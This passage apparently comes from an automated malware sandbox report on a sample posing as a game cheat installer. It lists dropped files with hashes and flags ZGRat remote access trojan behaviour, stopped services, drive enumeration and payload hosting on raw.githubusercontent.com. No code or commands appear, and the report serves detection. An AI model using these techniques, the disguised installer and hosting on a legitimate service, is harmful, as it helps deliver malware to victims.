SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe

MD5 ed3e72e64098a8d1f06f2d3e878a1726
SHA1 2043b9fd164001ff34593f60046d336f31d88c54
SHA256 d0a951bd3399e80859e4480212811498f3e47f07d9093824e9de50945fd26c97
SHA512 0b156a6509b648bcc525460c65d570d170fd4e219b06202ff82c40b11ddbc5313a9c684fe0ffc5327f689d878d9cf1b5472c874b5f02d8ee324dcf9bc5ab307a

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe

MD5 a952320d7d8733f0305d9605fc5d47a0
SHA1 55cebfb99a7d4c1a0e342dec78ffdc3e1f9199d5
SHA256 4358c9658701188b058cfa6d9e31a9e11d86fd32439054126243ff302d6d05b6
SHA512 9eb8c6d0efae204f56351efd688d7c784c84f99a4dbb8b7907b7f10c2ca7004ba3df840dee93fd438dbf468134645a50746f90dcbbcfb04d8c2069520def65ec

\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe

MD5 80325462354ec1024a791d305fa12223
SHA1 e50f33c1e2c5e3b7294fe728ef87f20092086dad
SHA256 3483fd6c8cda1d511def070147f6ca047c87a86a361d96bd2e043ad55fcb60d1
SHA512 a38eff3c1f975b39e856a4c866007c8d96a065d8b2d26665897fc735a5aeb7fddd23992bbb7fc771e75146a71615de3b7c1202c9a57408af29a4ac77cf0b74d5

\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe

MD5 3d9628c99cb244e8985f66d8f63d07ce
SHA1 22b70dbffcca22bdc10a5f3f2eea8a46c6dd7305
SHA256 815261f377b8dc59ac9caa1750a764bc2dc928f82ecbc082e861858e00a964ab
SHA512 fb01da166ee8395f29eee419ebc0d977e8599f227d5f740660ba90fefacca7a33662d81978382a397f04d1bbc9c52d9b06b4cb10291b62bdf0d21c9abbba36af

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe

MD5 4eb38163ec7522bcd7cc0b0065aaf84e
SHA1 9e883c473a41a10af49322e86f765ed98918cefa
SHA256 5a2bcadc0b34d7fe087a833efe757cf6d991b9a44da8ee97f861cab4077b12d5
SHA512 5965ecce24800aa5e38136d5f883f310b634830a68efdaf1d9a4c663c799f7751cc96ea45e63f291a115f4aebbf00fcd09a124d8d97c8df31b423cb19f1a264e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 170d2401e80719dd89ef5a6d47dc9d14
SHA1 8310eeb29f9429e19bac6156eab1c4d9cd0f80cf
SHA256 a2780a4e955f21a5396805cf8bd9bdcb5a6d0e32f69c31d66ad101e567fb63a7
SHA512 c144a4711b23dd376663ed4a3507e7eff362ad02dedbcda1113d2857b0e37ed5fe8358c166262c2b4efb72b082baf607c40f92d885e8fc19e71298eb08448a6c

C:\Users\Admin\AppData\Local\Temp\CabB482.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\TarB4B4.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarBAD2.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\Local\Temp\MSIBCE5.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSIBE3E.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 98eaf08d765c84234e781ff409d6f177
SHA1 1240aca1e134a370364920362ddec96a11910fa8
SHA256 00596cb45e4b6f276bf2a5886d499236cebe97e5568e4836c63ecee5aa727fba
SHA512 bd663cc5f6f748cf3b4816f7430ff90efdc4e2dc6f1129f66262dad4e48a2c592862be272fbb811aaed4a73948ad910071cb1f21025de611daf4fa37c8335c4a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 053f3bebf733809bed35a12e46a0c78d
SHA1 6eab25ce78471139fdab4119358001e912148845
SHA256 0a77a8730d688933d2fd811e986d958e41df2f438a66710f2e6734f0b80c299b
SHA512 bf3e43d24bd7e5f2ad7c4d65657f93acac7489ea54f81c2603cf573eebd54a4a834f70a82e3ebc9ff3b9daca61699e0bf29af7a455132e49d9e1fbfe83bbd731

C:\Windows\Installer\MSIC68F.tmp

MD5 9dd018853655ce80f20d9d1f48b6e11a
SHA1 92c04cae3a855a742129b7a6f67966b350fc7913
SHA256 4e2a4159114768a45ae915d5be9911b37fab41a84f6092f0769102c05e962453
SHA512 9e154725333257b40331f667198db5be8345970420e044727c8412c959b7613ea5e477d92607436279c6728570ef4b90d31d55b2870be3707d7dcf270ca992d1

C:\Windows\Installer\MSIC8B3.tmp

MD5 a8338e7b3ce49ab7e793952765ac998f
SHA1 29a2dd67eba553530f84f9e02266474ea678abdd
SHA256 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA512 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f

memory/2412-3637-0x000000001B3A0000-0x000000001B682000-memory.dmp

memory/2412-3638-0x0000000002450000-0x0000000002458000-memory.dmp

memory/2412-3639-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2412-3640-0x00000000029A0000-0x0000000002A20000-memory.dmp

memory/2412-3641-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pssCA25.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\scrCA14.ps1

MD5 61222e0e2596b5dc3f046a8e75afcdf6
SHA1 3d3226444ec4d5d32c6340e3a47385c6520b0a99
SHA256 e7c32bdc77350c6cf13b6ece42742359ea5fc17a0e45cd3d6611966906b5b089
SHA512 63e29193859c7961372a192345be4860a8a5001c7de313789e1f5cc49d6926a687e21bf0b5a7d412ee8613e7c6c4ab710b68f5567afc477b100f74706712603e

memory/2412-3644-0x00000000029A0000-0x0000000002A20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scrCA15.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 d3dff05f50e0edcecca77d97468a1aef
SHA1 87a217697bd981c8a9dc5a94ae65daf3ece5f081
SHA256 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e
SHA512 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005

memory/2412-3707-0x00000000029A0000-0x0000000002A20000-memory.dmp

memory/2412-3708-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\mock-globals\.gitignore

MD5 8da13f306c8c0f4f4a32960e93725b42
SHA1 b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256 ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA512 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-18 14:42

Reported

2024-03-18 14:49

Platform

win10-20240221-en

Max time kernel

102s

Max time network

308s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Stops running service(s)

evasion

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
